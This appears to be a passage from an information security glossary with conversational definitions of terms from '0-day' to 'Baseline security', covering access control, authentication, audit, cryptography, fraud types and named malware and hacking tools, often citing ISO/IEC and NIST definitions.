|
Term
|
Meaning
|
|
0-day
|
See zero-day.
|
|
3DES
|
See triple-DES.
|
|
2G, 3G,
3½G, 4G, 5G …
|
Second and successive generations of the digital network used by devices such as cellphones/smartphones and
USB modem sticks for voice calls, SMS/TXT
messaging and data
communications including mobile Internet
access. Defined
by the ITU under the International Mobile Telecommunications-2000 (IMT-2000)
and successive standards.
The 5G standards were introduced in 2017 with networks and consumer devices
on the way.
|
|
419
|
Section number of the Nigerian penal code criminalizing advance fee frauds.
Often refers to other social
engineering scams
as well, hence email
scammers are known colloquially as “419ers”.
|
|
AAA
(Authentication, Authorisation and
Accounting)
|
The main IT
security controls
associated with the logon
process i.e. authentication
to verify
the user’s claimed identity, authorisation or
allocation of the user’s defined access rights and permissions, and logging key details concerning the user’s
login and subsequent activities for accountability purposes. See also I&A.
|
|
ABAC
(Attribute Based Access Control)
|
“An access control method where subject requests to
perform operations on objects are granted or denied based on assigned
attributes of the subject, assigned attributes of the object, environment
conditions, and a set of policies that are specified in terms of those attributes
and conditions” (NIST SP800-162).
|
|
ABUEA
(Attribute-Based Unlinkable Entity Authentication)
|
A means for people to authenticate themselves anonymously,
without revealing so much personal information that their identity can be
‘linked’ (inferred or determined), compromising their privacy. See ISO/IEC 27551.
|
|
Access
|
The ability of a person, computer program etc. to
enter, interact with, use or misuse a controlled resource such as information, a site,
building, facility, room, system,
network, database, file, filing
cabinet, directory, disk or other device.
|
|
Access
authority
|
Organisation,
department, person, system,
program or function that determines whether to grant or deny access to controlled information assets such as personal
information. See also reference monitor.
|
|
Access
card, proximity card,
pass card, access badge,
staff pass, ID card,
RFID (Radio Frequency IDentification)
tag etc.
|
Authentication
device that (normally)
communicates wirelessly with a card reader (normally) located at an access controlled
door or gate to determine whether the expected card holder is authorized to
proceed. Vulnerable
to being lost, stolen or handed to someone else, and perhaps cloned or hacked. Often carries the authorized holder’s
photograph as well, giving alert and diligent security guards, receptionists and
other workers the
chance to determine at a glance whether the person presenting, wearing or using
the card resembles the mugshot (assuming they have not simply replaced the
photo or faked the
entire pass!).
|
|
Access
control
|
Security
control intended to govern access to an asset, permitting authorized and appropriate access whilst
preventing unauthorized
or inappropriate access. May be physical (such as a lock), electronic/digital (such as encryption), or procedural (such
as a nightclub bouncer checking the VIP guest list for the name on
your photo-ID). Often critically important, implying the need for strong assurance that it
is correctly designed,
implemented, configured, operating, managed and controlled. “Means to
ensure that access to assets is authorized and restricted based on business
and security requirements” (ISO/IEC 27000).
|
|
Access gateway
|
“A gateway that provides the system user access to
multiple security domains from a single device, typically a workstation” (NZ information security manual).
|
|
Access
matrix
|
Table relating users
or their rôles (on one axis) to the IT systems, application
functions and/or classes
of data (on the
other axis), showing the types of access
permitted and/or
denied (within the body of the table).
|
|
Access Point
(AP),
wireless access point
|
Network
router providing Wi-Fi
services, generally on a wired LAN. “A device that logically connects
wireless client devices operating in infrastructure to one another and
provides access to a distribution system, if connected, which is typically an
organisation’s enterprise wired network” (NIST SP 800-48 and
SP 800-121). “Device or piece of equipment that allows
wireless devices to connect to a wired network. Note: The connection uses a
wireless local area network (WLAN) or related standard.” (ISO/IEC 27033-6).
|
|
Access
policy,
access control policy
|
Security
policy or a set of defined rules determining authorized and controlled access to information assets such as functions,
tables or records
in a database, or
programs, files and directories on an IT system, or IT systems on a network, or
locations (sites, buildings, rooms, cabinets etc.) holding such assets. Typically used
to configure appropriate access
rights (for example read, write, delete and/or control) for user rôles which
are then assigned to individual users
authorized to perform those rôles (see RBAC).
|
|
Access
right,
logical access right,
right,
access permission
|
Individual people, systems, programs, organisations etc. may be granted
or denied access
to controlled resources such as data,
transactions/functions or physical locations according to whether the access
is authorized
i.e. their logical
access rights, permissions
or attributes match the access rules
or criteria associated with those resources according to the access policy.
May be documented
in the form of an access
matrix or permit.
See also right.
|
|
Accident
|
While information
security incidents
may result from deliberate acts by hackers,
malware, fraudsters, spies etc., the
greater proportion by number are in fact the result of inadvertent or
unintentional acts, natural or chance events, or errors. Physical accidents and
health-and-safety failures that befall workers constitute information security
incidents since people are information assets.
|
|
Accommodation address
|
Mail drop used for convenience and sometimes to conceal
the true location/identity
of a fraudster
by giving the appearance of belonging to a legitimate business or an innocuous member
of the general public.
|
|
Account
hijack,
account takeover
|
Taking unauthorized
control of a target’s bank,
credit card, email,
IT system or
telephone account by means of hacking,
social
engineering, malware
etc., typically as part of identity
fraud or some other attack.
|
|
Accountable,
accountability,
held to account
|
Someone (a person or organisation) who is held accountable for
something (such as a privacy
breach or some
other incident)
may be sanctioned in some way (‘held to account’) by an authority if they do not fulfil their obligations.
Sanctions may include penalties, disciplinary action, dismissal, prosecution,
withdrawal of privileges
etc. In contrast to responsibility,
accountability is a sticky property that cannot be unilaterally delegated or
passed by the accountable person or organisation to another, in other words the
buck stops here. “Required or expected to justify actions or
decisions; being answerable and responsible” (NZ information security manual).
|
|
Accounting,
account
|
Whereas normally the term implies financial
accounting, the underlying principles
and practices of systematically, formally and thoroughly recording and
cross-checking various details such that relevant parties can be held to account
for their activities are more widely applicable. Most IT systems, for instance, can
automatically record
information
about user logons, use of privileges and
overrides, alerts,
alarms and other
potentially significant events
in their log or
accounting files, with utilities to search and report on them, even if these
days they are no longer required to re-charge users for their use of the
computers (common practice prior to the 1990s).
|
|
Accreditation
|
The process of checking that an organisation or individual is competent to
check and certify others, to a level specified by some trusted authority. Often confused with certification,
the process of issuing certificates. “A procedure by which an
authoritative body gives formal recognition, approval and acceptance of the
associated residual security risk with the operation of a system and issues a
formal approval to operate the system” (NZ information security manual).
|
|
Accurate
|
Precise, truthful and valid, faithfully representing factual
reality. An integrity
property.
|
|
ACL
(Access Control List)
|
Security metadata
associated with a computer file, directory, disk, port etc. specifying, for example,
which users may or
may not access or
change the object’s security
settings, and whether successful and/or unsuccessful attempts to do so are logged. ACL
capabilities vary between operating
systems.
|
|
Acquirer
|
“Stakeholder that procures a product or service from
another party. Note: Procurement may or may not involve the exchange of
monetary funds.” (ISO/IEC
27036-1).
|
|
Acquisition
|
Initial phase or activity in the process of gathering, analysing and
presenting forensic
evidence, or procuring a product. “Process of creating a copy
of data within a defined set. Note: The product of an acquisition is a
potential digital evidence copy.” (ISO/IEC 27037). “Process for
obtaining a product or service” (ISO/IEC 27036-1).
|
|
Active Directory
Federation Services
(ADFS)
|
Proprietary Microsoft technology blending LDAP
(Lightweight Directory Access Protocol) with SAML for identification
and authentication, authorisation
and access control
purposes.
|
|
Active
shooter,
active killer
|
Suicidal terrorist
or brutally unhinged nutcase, often armed, who indiscriminately and violently
attacks innocent
people with intent to injure or kill as many as possible before being
arrested, disabled or killed. An extreme safety threat to everyone in the vicinity.
|
|
ActiveX
|
Microsoft technology for interactive web pages. Malicious ActiveX
controls (a form of malware)
may potentially compromise
the users’ systems: if the
browser security settings allow, even unauthenticated (‘unsigned’) ActiveX
controls may access
files on the user’s hard drive for example. Microsoft dropped Active X
support from its browsers in 2016.
|
|
Activist
|
Relatively mild extremist.
|
|
Actuary
|
A professional (typically employed by insurance companies)
who uses probability theory and mathematical techniques to analyse data and so quantify
and hence manage risk
with scientific rigor.
|
|
Acunetix
|
Hacking/penetration testing
tool.
|
|
Ad
injection
|
Browser malware
that displays advertisements and (in some cases) steals personal
information from infected
systems. See also
adware, XSS and HTML injection.
|
|
Administrative
account
|
See privileged user. “A user account with
full privileges on a computer. Such an account is intended to be used only
when performing personal computer (PC) management tasks, such as installing
updates and application software, managing user accounts, and modifying
operating system (OS) and application settings” (NIST SP800-114 rev1).
|
|
Administrative control
(ADCON)
|
See manual
control and management
control. ADCON is a US Navy abbreviation.
|
|
Admissible
|
Forensic
evidence must be trustworthy
if it is to be presented in court. Evidence that is dubious for some reason
(e.g. if there is reasonable doubt that it was in fact properly
collected, stored and analysed in full accordance with applicable laws,
regulations and standards
of good forensic practice) may be ruled
inadmissible by the judge and hence cannot be used to support or refute a
case.
|
|
Advance
fee fraud
|
Type of fraud
in which the fraudster
fools a naïve and vulnerable
victim into
sending money as ‘advance fees’ supposedly in order to secure a substantial
payout (such as an inheritance or lottery win) or other benefit (such as an
immigration visa) which, strangely enough, gets tantalizingly close but never
quite materializes. Commonly known as a 419 scam. Originally perpetrated by letter,
Telex and FAX but latterly more often by email, SMS/TXT, social media etc. Commonplace
form of social
engineering.
|
|
Adversary
|
An enemy of the organisation such as a malicious person,
group or organisation. May be a worker,
fraudster, hacker, competitor, pressure
group, government or terrorist,
who is willing to attack
and harm the organisation in some way (not necessarily physically) e.g. VXers, insider threats,
lobbyists, rumour-mongers, saboteurs
and cyberteurs.
A threat agent.
|
|
Adware
|
Annoying software
that displays advertisements etc. Considered by some to be malware since it is
often covert,
seldom knowingly authorized,
consumes resources and may have undesirable side-effects. See also ad injection. “Application
which pushes advertising to users and/or gathers user online behavior. NOTE
The application may or may not be installed with the user’s knowledge or
consent or forced onto the user via licensing terms for other software.” (ISO/IEC 27032).
|
|
Adwind,
AlienSpy, Frutas, Unrecom, Sockrat, JSocket, jRat
|
Heavily obfuscated
species of RAT malware available to rent on the black market (MaaS). Built using Java
so it can run on Windows, Linux, Android, MacOS and other systems with Java capabilities. Frutas
was first discovered in 2012 and variants were still in the wild as of 2018.
|
|
AES
(Advanced Encryption Standard)
|
‘Military grade’ cryptographic algorithm chosen by NIST in 2001 to
replace DES and
specified in the standard
FIPS 197. A symmetric block cipher
generally understood to be strong, but widespread distrust of the NSA following Ed
Snowden’s revelations casts doubt on that assertion.
|
|
Affirmative cyber risk
|
Cyber
incidents explicitly covered in cyberinsurance or other forms of insurance. Cf.
non-affirmative
cyber risk.
|
|
Agent
|
(a) Person who somehow (usually covertly) obtains legitimate access to confidential proprietary or personal
information but betrays their position of trust by disclosing or permitting access to the information by
an unauthorized
third party
(sometimes unwittingly), typically through a collector. See also spy. (b) A benign or malicious program, person or organisation
acting on behalf of another, for example gathering and passing-on data from one system or network for
collation and analysis centrally in conjunction with data fed by agents
running on other systems or networks.
|
|
Agent
provocateur
|
French term literally translated as ‘agent who provokes’, meaning a secret
agent who infiltrates
an organisation
and incites them to act illegally in such a way that they are likely to be
caught in the act. A cyberteur.
|
|
Agreement
|
Joint commitment of two or more parties to a shared objective.
“Mutual acknowledgement of terms and conditions under which a working
relationship is conducted” (ISO/IEC 27036-1).
|
|
Aggregation
|
The collection of information from disparate sources, for
example to profile
a target. Due to
explicit and/or inferred
relationships between items of information, aggregation and subsequent
analysis can generate new knowledge,
hence databases are
usually more valuable than the unorganised data items they contain: the whole is
greater than the sum of the parts.
|
|
Aircrack
ng
|
Wi-Fi
network hacking and penetration testing
tool, capable of cracking WEP,
WPA and WPA2/PSK.
|
|
Air gap
|
Complete physical and logical separation between
entities, for example isolating highly-secure networks from less-secure ones by
prohibiting any connections between them. Tends to fail-insecure, in other words if the
air-gap is somehow breached,
the destination tends to be highly vulnerable if excessive trust (faith) or reliance was placed on
the air-gap.
|
|
Air lock, air-lock,
airlock
|
See man
trap.
|
|
Alarm
|
Audio/visual warning of the occurrence of a critical security
and/or safety condition (e.g. fire/smoke, intruder, flood, gross system integrity failure) or incident requiring an urgent, high-priority
response. See also alert.
|
|
Alert
|
(a) Warning that a critical system security event (e.g. audit or security log file full, system shutdown initiated,
user authentication
failure) has occurred. While definitions vary, alerts generally signal
important but not necessarily critical conditions requiring less urgent
responses than alarms.
They are usually logged
for analysis and follow-up action if and when convenient. (b) A state of awareness,
vigilance and preparedness to react appropriately to events and incidents. “’Instant’ indication that
an information system and network may be under attack, or in danger because
of accident, failure or human error” (ISO/IEC 27033-1).
|
|
Algorithm,
cipher,
cypher
|
Mathematical function, process and/or protocol at the heart of a cryptosystem.
Determines the specific sequence of actions or operations necessary, for
example, to encrypt
the plaintext
and decrypt the cyphertext, or
to calculate and verify
a hash.
|
|
Allocated
space
|
“Area on digital media, including primary memory, which
is in use for the storage of data, including metadata” (ISO/IEC 27037).
|
|
Amplification attack,
reflection attack
|
Type of attack
in which network
servers are tricked
into transmitting a large volume of traffic to a target system, potentially overloading it and causing
Denial of Service.
NTP, DNS or other request packets
with spoofed
source IP addresses matching the target are sent to one or more network
servers which then forward their responses to the target instead of the
originator. See also DRDoS.
|
|
AMT
(Active Management Technology)
|
Intel incorporate hardware subsystems into some of their
CPU chips to facilitate low-level system
management.
In May 2017, Intel disclosed
a design flaw in
AMT that creates a severe vulnerability
allowing hackers
to gain privileged
access to systems
using the “Q series” chipset, either locally or through the network. The wisdom of allowing
low-level privileged system management in this way, through hardware that
bypasses normal BIOS
and operating system
security (a backdoor),
is in question.
|
|
Analysis
|
The process
of systematically analysing (exploring, investigating or evaluating)
something (such as risks,
incidents or forensic evidence)
in depth. “Process of evaluating potential digital evidence in order to
assess its relevance to the investigation. Note: Potential digital evidence,
which is determined to be relevant, becomes digital evidence.” (ISO/IEC 27042).
|
|
Analytical
model
|
Mathematical formula for generating metrics (such as a positive trend in a
relevant security parameter) from measurements (normally a time series of
values of the parameter), giving meaning to the numbers (“See, things are improving!”).
“Algorithm or calculation combining one or more base measures
and/or derived measures with associated decision criteria” (ISO/IEC 27000).
|
|
Anarchy,
anarchism,
anarchist
|
For ideological or other reasons, anarchists typically
seek to overthrow the government and disrupt organised society by (among
other things) sabotaging
vulnerable
parts of the critical [national]
infrastructure.
|
|
Angler
|
A crimeware
kit, in the
wild in 2016.
|
|
Angry
IP Scanner,
ipscan
|
Network
administration/security/penetration
testing tool vaguely similar to nmap. It scans (queries) IP address and
port ranges to identify network
nodes.
|
|
Anomaly,
anomalous
|
Something different, unusual, unexpected or out of the
ordinary. While large data
anomalies (such as numerous data values completely missing for a significant
period) may be easily spotted by eye (provided someone is actually looking!),
small anomalies in large data sets or databases
can be identified much more easily and reliably by systematic statistical
analysis e.g. applying Benford’s law. Such anomalies are
inherently interesting, hinting at the possibility of unexpected relationships,
biases or events, perhaps even information
security incidents
such as bugs, flaws, frauds, malware or hacks in progress.
|
|
Anonymity
|
A person’s ability or right to go about their life and business
while withholding their identity,
for example whistleblowing
or for privacy
reasons. Typically achieved through discretion, sometimes through a trusted third party
using techniques such as anonymisation,
tokenisation
or redaction.
|
|
Anonymisation
|
The redaction
of information
needed to identify specific individuals in a database, document etc. for example by tokenisation,
usually for privacy
reasons.
|
|
Anonymous
|
(a) Information that is not and cannot be linked
unambiguously to a specific, identifiable originator or source. (b) The name
of a “hacker collective”, a loosely-organised and indistinct group or
movement of pranksters, hackers,
digital vigilantes and subversive hacktivists active since 2004. Their
proclamations famously include the line “We are legion” spoken in a synthetic
voice emanating from a stylized mask. See also LulzSec.
|
|
Anti-pass-back
|
Physical
security access
control arrangement such as a man trap designed to prevent someone presenting
their access card
to open a one-person-at-a-time controlled
entrance for themselves, then handing their card back to someone else (typically
an unauthorized
visitor) permitting
them also to access the controlled area. Electronic access control systems may keep
track of people, preventing them from re-accessing an area unless they have
previously exited it, requiring them to present their access cards at both entry and
exit points. “A security mechanism preventing an access card or similar
device from being used to enter an area a second time without first leaving
it (so that the card cannot be passed back to a second person who wants to
enter).” (PCI Card Production and Provisioning Physical
Security Requirements, v2.0 January 2017).
|
|
Antivirus
[software, app, program, package]
|
Software
designed to
minimize the risk
of malware by
detecting, preventing and/or removing infections with viruses, network worms, Trojans, spyware, ransomware, rootkits etc.
|
|
APN
(Access Point Name)
|
A gateway linking a mobile network to the Internet or another network. Malware may
surreptitiously alter the APN on mobile devices, redirecting users to access points monitored and controlled by hackers.
|
|
Appliance
|
Computer system
or device dedicated
to a specific purpose, ready to use straight out of the box, requiring little
if any configuration or management.
Consumer networking
equipment such as broadband modems and access points are usually appliances, as
are some commercial firewalls.
Usually built around an embedded
system. Some whiteware (household appliances) are smart.
|
|
App,
application
|
Computer program or suite of programs providing a useful
function. Apps on smartphones,
tablet and portable PCs, particularly free social media or security apps downloaded
from the Web and installed by naïve users,
may be Trojans, spyware, network worms or other malware, especially
on jailbroken
devices.
|
|
Application development, software
development,
systems development
|
The process,
method, approach,
phase or stage within which new or updated software is coded (created). Sometimes
taken to include the earlier specification, architecture and design phases, and perhaps the software
testing, version
control, change
and configuration
management, and implementation activities that normally follow
development.
|
|
Application services
|
“Software with functionality delivered on-demand to
subscribers through an online model which includes web based or client-server
applications” (ISO/IEC
27032).
|
|
Application whitelist
|
The application of whitelisting to apps. “An approach in which all
executables and applications are prevented from executing by default, with an
explicitly defined set of allowed executables” (NZ information security manual).
|
|
APT
(Advanced Persistent Threat)
|
A highly sophisticated, sustained and ultimately damaging attack, or a series
of attacks, by a very resourceful, determined and capable adversary. Generally involves a
combination of methods
and tools, such as custom malware,
social
engineering, hacking
(including hacked hardware,
software or firmware,
including things)
and/or physical
intrusion.
|
|
ARA
(Analog Risk Assessment),
PIG
(Probability Impact Graph)
|
Visual security metric
analysing information
risks in two dimensions according to their relative likelihood or probability
of occurrence (on one axis) and (on the other axis) their relative severity
or potential impacts
on the organisation
if they were to occur. Risks that are both relatively likely and severe, or
those that are heading in that direction, are generally of greater concern
than the remainder and may be displayed in red or on a red background to
catch the readers’ attention.
|
|
Architecture
|
Overall grand design
or blueprint for an organisation’s
information systems and business
processes,
linking even higher level objectives
from various strategies to lower-level designs for individual systems and
processes. May incorporate the information security architecture. In
the physical
security context, the architectural design of a facility can
enhance or hinder its security. “Fundamental organisation of a system
embodied in its components, their relationships to each other, and to the
environment, and the principles guiding its design and evolution” (ISO/IEC
15288:2008, cited by ISO/IEC 27033-1).
|
|
Archive,
archival
|
Secure
long-term storage of valuable information,
designed to
ensure its integrity,
availability
and often (but not necessarily) its confidentiality and so maintain its
value. May be required for compliance
reasons e.g. organisations
are obliged
by applicable laws and regulations to provide certain types of business
record several years after they were created. In a few cases, the retention period
is indefinite.
|
|
Armor
|
Strong protective
plates, typically comprising layers of leather, steel, Kevlar/carbon-fibre/composite
materials and ceramics that absorb and spread the energy, resisting
penetration by weapons such as swords, daggers/knives, shrapnel and bullets.
The physical security
version of hardening.
|
|
Arson
|
Deliberately setting fire to or burning something without its
owner’s permission, or
with intent to defraud
another (such as an insurance company). A form of sabotage. A threat to many tangible assets.
|
|
ASLR
(Address Space Layout Randomisation)
|
Security
technique that randomizes memory addressing for processes, function calls etc.,
frustrating hacking
attempts to invoke or replace privileged
functions occupying fixed and hence predictable addresses through buffer overflows
and similar exploits.
See also KASLR.
|
|
ASP (Application Service
Provider)
|
“Operator who provides a hosted software solution that
provides application services which includes web based or client-server
delivery models. EXAMPLE Online game operators, office application providers
and online storage providers.” (ISO/IEC 27032).
|
|
Assert,
assertion
|
Unilaterally state or claim something to be true, without
necessarily having or providing the evidence to prove it.
|
|
Assertive
|
Dominant, coercive,
overbearing or authoritarian, able to exert strong influence on another
without resorting to overt aggression or violence. A powerful technique in
many social
engineering attacks
as well as legitimate
controlling activities (“Hands up! You’re nicked!” for instance).
|
|
Asset
|
Something of value to its owner whereas if it has little, no or
even negative value to its owner, or is more valuable to another, it may be a
liability. May be tangible (e.g. a building, hardware, signed/executed contract or license/approval,
person, cash, IOU, padlock),
intangible (e.g. knowledge,
experience, know-how, skill,
capability, competence, tradecraft, information,
software,
creative idea, concept, relationship, virtual organisation, brand, reputation, trust, loyalty, goodwill, bank credit, application or service,
right or permission,
understanding, verbal contract, obligation) or indeterminate sharing both tangible and
intangible characteristics (e.g. trademark, patent, firmware, data, database, system, security). See also information asset.
“Anything of value to an agency, such as IT equipment and software,
information, personnel, documentation, reputation and public confidence” (NZ information security manual). “Legal
right or organisational resource which is controllable by an entity and has
the capacity to generate economic benefits” (ISO
10668). “Anything that has value to an individual, an organisation
or a government” (ISO/IEC
27032).
|
|
Assurance
|
The provision of a certain level of trust, confidence, confirmation or proof
of something, typically by reviewing,
checking, testing, certified compliance
or auditing it. A
security-assured program, for example, has been tested to confirm that
it fulfils information
security requirements.
|
|
Asymmetric
|
Type of cryptosystem
that uses pairs of mathematically related but quite different public and private keys to either encrypt or decrypt. Although
the pairs of keys are related and are fairly simple to generate (on a
computer at least), it is infeasible to guess or calculate either key from
the other without additional information.
Cf. symmetric.
|
|
AtomBombing
|
Code
injection exploit
that alters the atom tables used internally by Windows to store and
communicate strings during program execution.
|
|
ATT&CK
(Adversarial Tactics, Techniques,
& Common Knowledge)
|
MITRE’s knowledgebase of cyber-attack tactics and techniques,
first published in 2015. See attack.mitre.org.
|
|
Attack
|
Type of information
security incident
actively and deliberately perpetrated by someone (the attacker or adversary)
on one or more victims
(people and/or organisations)
without their permission.
Cf. accident
or act of god. “Attempt to destroy, expose, alter, disable, steal or gain
unauthorized access to or make unauthorized use of an asset” (ISO/IEC 27000).
|
|
Attacker
|
Person, group or organisation actively mounting one or
more attacks. “Person
deliberately exploiting vulnerabilities in technical and non-technical
security controls in order to steal or compromise information systems and
networks, or to compromise availability to legitimate users of information system
and network resources” (ISO/IEC
27033-1).
|
|
Attack
surface
|
A notional 3-dimensional representation of the organisation’s
information assets,
risks etc.
where the height axis in some way reflects vulnerabilities and/or their exposure by
various parts of the organisation, forming a complex and dynamic ‘surface’
that might be actively attacked
or exploited by hackers, malware etc.
to the corresponding extent. Implies that improving the protection of
information assets and/or reducing the exposure or extent of vulnerabilities
will somehow improve the organisation’s information security … without specifying
precisely how. A security metric.
See also security
landscape, risk
universe, risk
profile and heatmap.
“The amount of IT equipment and software used in a system. The greater
the attack surface the greater the chances are of an attacker finding an
exploitable vulnerability” (NZ information security manual).
|
|
Attack toolkit
|
See crimeware.
|
|
Attagging
|
The use of QRcodes, perhaps stuck over legitimate
QRcodes, containing malicious
JavaScript or URLs linking to infectious
or phishing
websites. Exploits
our inability to interpret them simply by eye.
|
|
Attest,
attestation
|
Formally documented
assertion by a
duly authorized
and accountable
person that the organisation
complies with
(fulfils the requirements of) particular laws, regulations or professional
practices (such as relevant governance,
accounting and audit
standards).
Although highly stylized and very precisely worded to exclude other
liabilities, the signatories are personally accountable for the veracity of such
statements, hence attestation carries a lot of weight and is taken very
seriously. A surprisingly powerful administrative control, akin to taking an oath.
|
|
Attribute
|
Characteristic. “Property or characteristic of an object that
can be distinguished quantitatively or qualitatively by human or automated
means” (ISO/IEC
27000).
|
|
Attribution
|
(a) Acknowledgement referencing the source, originator
and/or owner of intellectual property being
reproduced elsewhere in order to thank them and (hopefully) reduce the risk of being accused
of plagiarism
or copyright
abuse. [Note: strictly speaking, attribution is irrelevant to copyright
infringement but it is ethical
and polite to acknowledge one’s sources.] (b) Cybersecurity incidents are often blamed
on (attributed to) certain perpetrators according to someone’s evaluation of
evidence in the malware
or hacking tools
used, or other clues such as the demands and claims made. However,
perpetrators of illegal acts are (for obvious reasons) keen to remain
undercover and may deliberately mislead the analysts by seeding false leads.
Furthermore, attacks
often involve a blend of code, tools and techniques from disparate sources,
obtained through the hacking
underground scene and used or adapted for the specific purpose at
hand.
|
|
Audit
|
Structured assurance
process of
examination, review,
assessment, testing and reporting by one or more competent and trusted people who – crucially – are
independent of the subject area being audited. In many organisations,
‘audit’ also refers to the business department or function (usually “Internal
Audit”, “Quality Audit” etc.) and/or third party organisation (more formally
“External Audit”) responsible
for auditing. Derived from the Latin audio (to listen). “Systematic,
independent and documented process for obtaining audit evidence and
evaluating it objectively to determine the extent to which the audit criteria
are fulfilled. Notes: an audit can be an internal audit (first party) or an
external audit (second party or third party), and it can be a combined audit
(combining two or more disciplines); ‘audit evidence’ and ‘audit criteria’ are
defined in ISO 19011” (ISO/IEC
27000). “An independent review of event logs and related
activities performed to determine the adequacy of current security measures,
to identify the degree of conformance with established policy or to develop
recommendations for improvements to the security measures currently applied”
(NZ information Security Manual).
|
|
Auditability
|
An assurance
objective for
many important IT systems,
processes,
business relationships etc. meaning that they are capable of being audited. Implies the
need to retain high integrity
records of relevant events
and activities (e.g. secure logs) that can be independently reviewed if and when
required.
|
|
Audit
logging
|
“Recording of data on information security events for
the purpose of review and analysis, and ongoing monitoring” (ISO/IEC 27033-1).
|
|
Audit
scope
|
Coverage of an audit.
“Extent and boundaries of an audit” (ISO 19011:2011).
|
|
Audit
tools
|
“Automated tools to aid the analysis of the contents of
audit logs” (ISO/IEC
27033-1).
|
|
Audit
trail
|
Chronological record of important transactions or stages
in a business or ICT
process, which
may be used to reconstruct the exact sequence of events. An IT system security log, for example, is typically configured
to record details such as successful and failed system logons, security alarms and alerts etc. with timestamps.
|
|
AUP
(Acceptable Use Policy)
|
Semi-formal policy
or guideline
laying out and contrasting acceptable against unacceptable use of information, ICT services, systems etc.
in plain English.
|
|
Authentication,
authenticate
|
Control
process by which
a specific individual user,
system, message,
block of data etc.
is positively identified and confirmed authentic, typically on the basis of
something they know (e.g. a password) and sometimes something they
have (credentials),
something they are (meaning biometrics)
and/or where they are (their virtual/network or physical location). Usually
involves cryptography.
Authentication is a critically important and hence inherently risky control: if the process fails, is
bypassed, undermined, spoofed or disabled, many other security controls (such
as access controls,
audit trails,
logging
and alerting) are
also rendered ineffective, often with no indication of anything amiss. “Provision
of assurance that a claimed characteristic of an entity is correct” (ISO/IEC 27000).
|
|
Authentic,
authenticity
|
Verifiably
genuine, not counterfeit
or fake. “Property
that an entity is what it claims to be” (ISO/IEC 27000).
|
|
Authority
|
Person, rôle, organisation etc. of high status
or seniority (such as a manager,
regulator, government agency, tribal elder or significant other) or a stakeholder
that commands respect, compliance
and/or obedience, thus exerting influence or control over subordinates.
|
|
Authorisation,
authorize
|
Permitted,
accepted and/or agreed by management
or some other authority
as being in the best interests of the organisation, the workforce, the stakeholders or
society at large. Cf. unauthorized.
|
|
Autodiscovery
|
Some network
servers advertise
their services (such as multimedia or printing) by routinely broadcasting
network messages, allowing them to be ‘discovered’ by other network systems.
|
|
Automated
control
|
Control
embedded in an electronic or mechanical system capable of operating automatically
without necessarily involving a person in order to function. Cf. manual control.
|
|
Autonomous
weapon
|
A ‘fire-and-forget’ cyberweapon capable of acting
autonomously or semi-autonomously using smarts (artificial intelligence) to
complete complex reconnaissance, surveillance and/or combat missions with
little if any direct involvement and real-time control by human operators, in contrast
to remote-controlled or dumb weapons. May be a physical device or malware.
|
|
Autorooter
|
Software
tool (malware)
that gives hackers
or script kiddies
fully privileged
access to vulnerable systems.
|
|
Availability
|
One of the three core objectives of information security, along with confidentiality
and integrity
(the CIA triad).
Availability concerns the requirement for information, IT systems, people and processes to be operational and
accessible when needed, implying the use of resilience and/or recovery controls to guard against unacceptable
disruption or interruption of necessary services. “Property of being
accessible and usable upon demand by an authorized entity” (ISO/IEC 27000).
|
|
Avalanche
|
A global criminal botnet
infrastructure used for phishing,
malware
distribution and money
mule recruitment.
|
|
Awareness,
vigilance
|
General appreciation by workers of their rôle in the process of securing the organisation’s
information assets,
for instance through compliance
with policies, laws and
other security obligations
and responsibilities.
Being vigilant for, and responding appropriately to, information security threats, vulnerabilities, near misses, events and incidents is an extremely important form
of control. See
also education,
training and security culture.
|
|
Axiom
|
A fundamental information
security policy requirement, architectural principle or rule. Axioms may be derived from first principles,
and/or from sources such as the control objectives defined in ISO/IEC 27002 to
justify and underpin the organisation’s
information security
policy statements,
standards, procedures, guidelines and controls.
|
|
BabyShark
|
Malware
species used by the Kimsuky
hacker group. Written in Visual Basic Script.
|
|
Back channel
|
See covert
channel.
|
|
Backdoor,
trapdoor
|
Cryptic control bypass function in a program
allowing users to access the system without
proper authorisation.
Sometimes coded in for legitimate
software
development, testing or support purposes (e.g. ‘cheat codes’ used to bypass the early
stages in an electronic game or make a game character invincible, immune to attacks),
occasionally for dubious, unethical,
nefarious or malicious
purposes (e.g. hacking,
coercion, embezzlement, fraud, espionage or covert license compliance
checks, or introduced by malware).
|
|
Background
check
|
Pre-employment screening process that evaluates a new starter’s
social and family background, identity, employment record, immigration
status, criminal record, credit status etc. to identify security and trustworthiness
issues. A service often provided by specialist suppliers. The nature,
extent and thoroughness of the checks varies widely in practice due to legal
and time constraints, privacy
concerns, policy,
costs and practicalities, the particular rôle etc. See also security clearance
and positive vetting.
|
|
Backup
|
Snapshot copy of data,
programs, configurations etc. from an IT system at a given point in time.
Backups provide the ability to restore a system to a known state after an incident (such as
a ransomware
infection) but are generally not intended to last as long as archives. Integrity and availability
are critical concerns for backups, plus confidentiality if the information
content is sensitive,
hence backups must be risk-assessed
and secured,
normally by means of documented
policies and procedures, redundancy,
firesafes, off-line and off-site storage, encryption, testing to prove
recoverability, oversight/monitoring
etc.
|
|
BadRabbit
|
One of several species
of ransomware
in the wild
that surreptitiously encrypts
victims’ data, coercing them into
paying a ransom
for the decryption
keys.
|
|
Badge access
|
See access
card.
|
|
Bailey
|
Courtyard in a Mediaeval castle.
|
|
Baiting
|
Social
engineering method of [figuratively] dangling something attractive
in front of victims,
such as a 419 or phishing email,
what appears to be a dropped/lost USB stick, or an advertisement, web page etc.,
typically containing malware.
|
|
Bait-and-switch
|
Ancient social engineering trick in which a victim is enticed to
purchase an attractive display item that is then surreptitiously substituted
by an item of much lesser value.
|
|
Balancing
control
|
Control
that involves reconciling
complementary (equal and opposite) values, as in double-entry
bookkeeping etc.
|
|
Bank
Trojan,
banking Trojan,
online banking Trojan,
banker Trojan
|
Trojan
(such as Zeus) that captures user authentication credentials (typically by keylogging) or hijacks web sessions (usually via man-in-the-middle attacks) to steal funds from online bank accounts.
|
|
Barbed
wire
|
Fencing wire with sharp barbs evenly spaced every few
inches to snag the clothing and prick the skin of any intruders foolish enough to climb over.
A physical
security control
with some deterrent
effect, though less extreme than razor wire or spikes.
|
|
Bare
metal
|
Refers to the tangible computer hardware platform on which host operating systems,
including hypervisors,
run, as distinct from the virtual (simulated) hardware on which guest systems run
in a virtual system.
|
|
Base
measure
|
“Measure
defined in terms of an attribute and the method for quantifying it.
Note: a base measure is functionally independent of other measures” (ISO/IEC
15939:2007).
|
|
Baseline
security
|
The lowest permissible/acceptable
level or form of security in a given situation (such as a particular organisation, physical security
zone or data classification level,
